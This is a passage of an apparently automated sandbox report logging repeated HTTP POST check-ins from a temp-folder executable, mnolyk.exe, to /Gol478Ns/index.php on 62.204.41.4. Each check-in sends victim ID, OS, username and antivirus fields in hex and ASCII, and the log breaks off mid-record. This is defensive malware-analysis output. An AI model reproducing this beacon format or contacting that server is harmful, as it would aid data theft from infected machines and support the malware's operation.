                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:31.406748056 CET717INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          563192.168.2.65028862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:31.578001022 CET718OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:31.641931057 CET718INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          564192.168.2.65028962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:31.813234091 CET719OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:31.878911972 CET719INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          565192.168.2.65029062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:32.058144093 CET720OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:32.123802900 CET720INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          566192.168.2.65029162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:32.300203085 CET721OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:32.363375902 CET721INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          567192.168.2.65029262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:32.559191942 CET722OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:32.622472048 CET722INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          568192.168.2.65029362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:32.801080942 CET723OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:32.864428043 CET723INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          569192.168.2.65029462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:33.100244999 CET724OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:33.166033983 CET724INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          57192.168.2.64977762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:04.763084888 CET171OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:04.827470064 CET177INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          570192.168.2.65029562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:33.354557991 CET725OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:33.419173002 CET725INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          571192.168.2.65029662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:33.595122099 CET726OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:33.658972025 CET726INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          572192.168.2.65029762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:33.829767942 CET727OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:33.894370079 CET727INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          573192.168.2.65029862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:34.067173958 CET728OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:34.133635044 CET728INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          574192.168.2.65029962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:34.321474075 CET729OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:34.386110067 CET729INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          575192.168.2.65030062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:34.563838005 CET730OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:34.627953053 CET730INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          576192.168.2.65030162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:34.801016092 CET731OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:34.866466045 CET731INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          577192.168.2.65030262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:35.050149918 CET732OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:35.117278099 CET732INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          578192.168.2.65030362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:35.307802916 CET733OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:35.371079922 CET733INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          579192.168.2.65030462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:35.546382904 CET734OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:35.610938072 CET734INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          58192.168.2.64977862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:04.997292995 CET178OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:05.060085058 CET178INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          580192.168.2.65030562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:35.785500050 CET735OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:35.849256039 CET735INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          581192.168.2.65030662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:36.017601967 CET736OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
